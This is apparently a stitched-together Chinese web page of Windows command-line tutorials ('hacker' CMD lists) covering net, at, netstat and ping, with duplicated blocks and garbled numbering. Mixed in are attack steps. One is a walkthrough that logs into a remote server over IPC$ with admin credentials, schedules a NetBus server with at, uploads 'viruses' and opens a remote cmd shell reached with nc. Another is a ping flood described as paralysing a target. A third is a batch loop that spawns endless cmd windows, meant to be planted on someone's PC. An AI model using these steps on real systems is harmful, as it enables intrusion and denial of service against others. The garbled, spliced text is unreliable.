NET USERNET GROUP NET SESSION NET VIEWNET HELP SERVICES 列出用户可以启动的网络服务。NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。NET HELP command | MORE 用于逐屏显示帮助。我可就不逐样解释了——这样会把我的手指累坏,就说说常用的两个命令吧a.net view这个命令的语法是:NET VIEW [\computername | /DOMAIN[:domainname]]NET VIEW /NETWORK:NW [\computername]NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。\computername 指用户希望浏览其共享资源的计算机。/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare 网络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行net view \***.***.**.*** 就可以了b.net use这个命令的语法是:NET USE [devicename | *] [\computernamesharename[volume] [password | *]][/USER:[domainname]username][[/DELETE] | [/PERSISTENT:{YES | NO}]]NET USE [devicename | *] [password | *]] [/HOME]NET USE [/PERSISTENT:{YES | NO}]NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线 (\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。sharename 指共享资源的网络名字。volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。password 指访问共享资源所需要的密码。* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。/USER 指定连接时的一个不同的用户名。domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。username 指定登录的用户名。/HOME 将用户与他们的宿主目录相连。/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。YES 在连接产生时保存它们,并在下次登录时恢复它们。NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:在浏览器中输入 file:///\***.***.**.***c则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……5.at: 排定在特定的日期和时间运行某些命令和程序。运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。C:>net start scheduleSchedule 正在启动服务.....Schedulw 服务启动成功。AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]]AT [\computername] time [/INTERACTIVE][ /EVERY:date[,...] | /NEXT:date[,...]] "command"\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id 指定给排定进度命令的识别号。/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。time 指定命令运行的时间。interactive 允许作业在运行时,与用户通过桌面交互。/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。"command" 准备运行的 Windows NT 命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:1 利用管理员登陆到目的服务器,方法为: net use \x.x.x.xipc$ "adminpwd" /user:"adminuser"2 利用ntsrv.exe启动远程: netsvc \x.x.x.x schedule /start3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:at \x.x.x.x 00:00 ntsrv.exe /port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:>winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp.C:>注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^4.netstat 这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]-a Displays all connections and listening ports.(显示所有连接和监听端口)-e Displays Ethernet statistics. This may be combined with the -soption.(显示以太连接,可以与-s连用)-n Displays addresses and port numbers in numerical form.(显示地址和端口)-p proto Shows connections for the protocol specified by proto; protomay be TCP or UDP. If used with the -s option to displayper-protocol statistics, proto may be TCP, UDP, or IP.-r Displays the routing table.-s Displays per-protocol statistics. By default, statistics areshown for TCP, UDP and IP; the -p option may be used to specifya subset of the default.interval Redisplays selected statistics, pausing interval secondsbetween each display. Press CTRL+C to stop redisplayingstatistics. If omitted, netstat will print the currentconfiguration information once.(interval是设定一个刷新时间,在间隔时间内暂停,按CTRL+C停止……) 这是我在本机未连接网络时运行的,第一列为协议,第二列为本地地址,第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号),最后一列是状态。这个命令以-n和-a的参数我较常使用,读者可以参考使用。
ping命令详解 对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-listOptions:-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.不停的ping地方主机,直到你按下Control-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。-a Resolve addresses to hostnames.解析计算机NetBios名。示例:C:\>ping -a 192.168.1.21Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Ping statistics for 192.168.1.21:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。-n count Number of echo requests to send.发送count指定的Echo数据包数。在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:C:\>ping -n 50 202.103.96.68Pinging 202.103.96.68 with 32 bytes of data:Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Request timed out.………………Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Ping statistics for 202.103.96.68:Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:Minimum = 40ms, Maximum = 51ms, Average = 46ms从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。-l size Send buffer size.定义echo数据包大小。在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)C:\>ping -l 65500 -t 192.168.1.21Pinging 192.168.1.21 with 65500 bytes of data:Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254………………这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。-f Set Don't Fragment flag in packet.在数据包中发送“不要分段”标志。在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。-i TTL Time To Live.指定TTL值在对方的系统里停留的时间。此参数同样是帮助你检查网络运转情况的。-v TOS Type Of Service.将“服务类型”字段设置为 tos 指定的值。-r count Record route for count hops.在“记录路由”字段中记录传出和返回数据包的路由。在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)Pinging 202.96.105.101 with 32 bytes of data:Reply from 202.96.105.101: bytes=32 time=10ms TTL=249Route: 202.107.208.187 ->202.107.210.214 ->61.153.112.70 ->61.153.112.89 ->202.96.105.149 ->202.96.105.97 ->202.96.105.101 ->202.96.105.150 ->61.153.112.90Ping statistics for 202.96.105.101:Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 10ms, Maximum = 10ms, Average = 10ms从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。-s count Timestamp for count hops.指定 count 指定的跃点数的时间戳。此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。-j host-list Loose source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。-k host-list Strict source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。-w timeout Timeout in milliseconds to wait for each reply.指定超时间隔,单位为毫秒。此参数没有什么其他技巧。ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]"DefaultTTL"=dword:000000ff255---FF128---8064----4032----20 好了,ping命令也基本上完全讲解完了
1.新建文档 输入 :startstart cmdgoto start后缀名改为bat远程连接127.0.0.1 (任意ip)将文件放在他的电脑里或输入shutdown -s -r我只是个孩子 只懂这点shutdown -s -t 60 表示一分钟后关机 taskkill -f -im cmd.exe表示关闭cmd
cmd命令大全
cmd相信大家都有所了解,鉴于它的强大功能,我想您一定也想了解它吧。要知道,cmd命令是每个黑客必备的能力之一啊。听到这里,您有没有很激动呢?如果有的话,就一起跟我来了解一下这神秘有强大的命令行吧,下面我就为您带来其相关内容~一起来看看吧!命令提示符Windows 命令提示符(cmd.exe)是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows CE 下只用于运行控制面板程序的外壳程序。简介Windows 命令提示符(cmd.exe)是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows CE 下只用于运行控制面板程序的外壳程序。那么该如何使用这个命令进入文件夹呢?1.开始->运行->CMD2.进入某个磁盘,直接盘符代号:如D:,不用CD 命令切换3.进入除根录以下的文件夹 cd 文件夹路径 例如我要进入 E:/Program Files/PHP 就输入 E:回车注: 不 能在一打开CMD的时候运行CD E:/Program Files/PHP,需要先进入磁盘(若一打开CMD的时候运行CD E:/Program Files/PHP,目录不会切换,但在下次输入盘符的时候进入上一次希望进入的目录,如输入E:会直接进入E:/Program Files/PHP)输入 CD "Program Files"/PHP 回车注:如果需要在dos下查看带有空格的文件夹(如Documents and settings,Program files等文件夹),可以有下面两种处理方法:1、给文件夹加引号。 如C:/>cd c:/"documents and settings"这样的好处是多长的文件名都可以全部显示出来。2、由于一般情况下DOS系统只支持8.3格式的文件名,因此在DOS下遇到长文件名的文件夹时,取前面6位,然后在后面加上一个~号和数字1。 你可以输入C:/>cd c:/docume~1 进入Documents and settings文件夹。当截取前面的6个字母之后出现重复时,可以将1改为2,依此类推。3.进入上一层目录 CD ../4.显示目录下的文件及了目录 dir以上就是我大哥的关于cmd如何进入文件夹的相关内容了,相信一定以及解决了您的问题。如果你还有什么关于cmd的问题,请尽可能的登陆我们土巴兔网站寻求帮助,我们网站能够提供给您最权威的的解决方案,保证能够解决您的问题!关于cmd进文件夹的问题,我就介绍到这里了
10个很酷的cmd命令是什么?
10个很酷的cmd命令:1、ipconfig功能:查询本机IP地址。操作方法:只要在在打开的cmd命令界面中输入“ipconfig”就可以了。2、msg功能:向对方电脑发送一条文本提示。操作方法:首先你要知道对方的IP地址,接下来输入命令“msg /server:对方电脑IP * ”。在“*”后输入你要发送的内容即可。3、Net user功能:查看本机账户情况。操作方法:和ipconfig一样,net user也有很多衍生的命令后缀,比方说“net user xxx 123456 /add”,输入后就会在系统中创建一个名为“xxx”的新用户,而新用户密码则是“123456”。4、Net share作用:查看共享资源。操作方法:在cmd界面中输入“net share”查看所有已共享资源,然后输入“net share 要删除的共享文件夹 /delete”就可以啦!5、Nslookup作用:检查网站IP地址。操作方法:在提示符状态输入“nslookup 对方网站域名”,哒哒哒哒……结果出来了!6、Netsh wlan show作用:探秘Wi-Fi配置文件。操作方法:在提示符状态输入命令“netsh wlan show profile SSID key=clear”,输入完成后Windows会自动返回当前已连接WIFI的详细信息,包括SSID和连接密码。当前这里有一个前提,那就是你现在已经成功连接了。7、telnet作用:看电影《星球大战》。操作方法:在提示符状态输入命令“telnet towel.blinkenlights.nl”,输入完成后稍等一会即可,电影会自动开演!8、|作用:将命令结果输出到剪贴板。操作方法:在需要导出结果的命令后方添加“|”,再加入导出位置就可以了。比方说“| clip”是导出到剪贴板,“| xxx.txt”是导出到xxx.txt。总之,你需要什么地方用,就放到哪儿,“|”支持绝大多数CMD指令。9、&&作用:将多个命令“连接”起来,一步运行多组命令操作方法:&&是CMD里一项“命令连接”语句,直接放在要连接的命令行中间即可。效果就是下图所示,一次输入后CMD会顺序执行所有命令。10、dfrg.msc作用:硬盘碎片整理工具。磁盘碎片整理程序,windows组件之一。操作方法:主要用于系统对硬盘的文件管理。该程序可将磁盘的碎片压缩,转移,优化磁盘的文件系统。定期进行磁盘碎片整理,可以改善硬盘的读写速率。还有专门的磁盘整理软件,如windows优化大师集成的磁盘整理程序,o&o Defrag等。
命令有哪些 黑客CMD Ping命令大全
1. gpedit.msc-----组策略 2. sndrec32-------录音机3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。4. explorer-------打开资源管理器5. logoff---------注销命令6. shutdown-------60秒倒计时关机命令7. lusrmgr.msc----本机用户和组8. services.msc---本地服务设置9. oobe/msoobe /a----检查XP是否激活10. notepad--------打开记事本11. cleanmgr-------垃圾整理12. net start messenger----开始信使服务13. compmgmt.msc---计算机管理14. net stop messenger-----停止信使服务15. conf-----------启动netmeeting16. dvdplay--------DVD播放器17. charmap--------启动字符映射表18. diskmgmt.msc---磁盘管理实用程序19. calc-----------启动计算器20. dfrg.msc-------磁盘碎片整理程序21. chkdsk.exe-----Chkdsk磁盘检查22. devmgmt.msc--- 设备管理器23. regsvr32 /u *.dll----停止dll文件运行24. drwtsn32------ 系统医生25. rononce -p----15秒关机26. dxdiag---------检查DirectX信息27. regedt32-------注册表编辑器28. Msconfig.exe---系统配置实用程序29. rsop.msc-------组策略结果集30. mem.exe--------显示内存使用情况31. regedit.exe----注册表32. winchat--------XP自带局域网聊天33. progman--------程序管理器34. winmsd---------系统信息35. perfmon.msc----计算机性能监测程序36. winver---------检查Windows版本37. sfc /scannow-----扫描错误并复原38. taskmgr-----任务管理器(2000/xp/200340. wmimgmt.msc----打开windows管理体系结构(WMI)41. wupdmgr--------windows更新程序42. wscript--------windows脚本宿主设置43. write----------写字板45. wiaacmgr-------扫描仪和照相机向导46. winchat--------XP自带局域网聊天49. mplayer2-------简易widnows media player50. mspaint--------画图板51. mstsc----------远程桌面连接53. magnify--------放大镜实用程序54. mmc------------打开控制台55. mobsync--------同步命令57. iexpress-------木马捆绑工具,系统自带58. fsmgmt.msc-----共享文件夹管理器59. utilman--------辅助工具管理器61. dcomcnfg-------打开系统组件服务62. ddeshare-------打开DDE共享设置110. osk------------打开屏幕键盘111. odbcad32-------ODBC数据源管理器112. oobe/msoobe /a----检查XP是否激活68. ntbackup-------系统备份和还原69. narrator-------屏幕“讲述人”70. ntmsmgr.msc----移动存储管理器71. ntmsoprq.msc---移动存储管理员操作请求72. netstat -an----(TC)命令检查接口73. syncapp--------创建一个公文包74. sysedit--------系统配置编辑器75. sigverif-------文件签名验证程序76. ciadv.msc------索引服务程序77. shrpubw--------创建共享文件夹78. secpol.msc-----本地安全策略79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码80. services.msc---本地服务设置81. Sndvol32-------音量控制程序82. sfc.exe--------系统文件检查器83. sfc /scannow---windows文件保护84. ciadv.msc------索引服务程序85. tourstart------xp简介(安装完成后出现的漫游xp程序)86. taskmgr--------任务管理器87. eventvwr-------事件查看器88. eudcedit-------造字程序89. compmgmt.msc---计算机管理90. packager-------对象包装程序91. perfmon.msc----计算机性能监测程序92. charmap--------启动字符映射表93. cliconfg-------SQL SERVER 客户端网络实用程序94. Clipbrd--------剪贴板查看器95. conf-----------启动netmeeting96. certmgr.msc----证书管理实用程序97. regsvr32 /u *.dll----停止dll文件运行98. regsvr32 /u zipfldr.dll------取消ZIP支持 99. cmd.exe--------CMD命令提示符
ping命令,只是一个很常用的命令。 有很多的参数, 详细使用方法还要参考ping命令手册。Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface][-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos][-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option][-w deadline] [-W timeout] [hop1 ...] destinationUsage: ping -6 [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface][-l preload] [-m mark] [-M pmtudisc_option][-N nodeinfo_option] [-p pattern] [-Q tclass] [-s packetsize][-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] destination
ping命令,只是一个很常用的命令。 有很多的参数, 详细使用方法还要参考ping命令手册。Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface][-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos][-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option][-w deadline] [-W timeout] [hop1 ...] destinationUsage: ping -6 [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface][-l preload] [-m mark] [-M pmtudisc_option][-N nodeinfo_option] [-p pattern] [-Q tclass] [-s packetsize][-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] destination
本文由 在线网速测试 整理编辑,转载请注明出处。
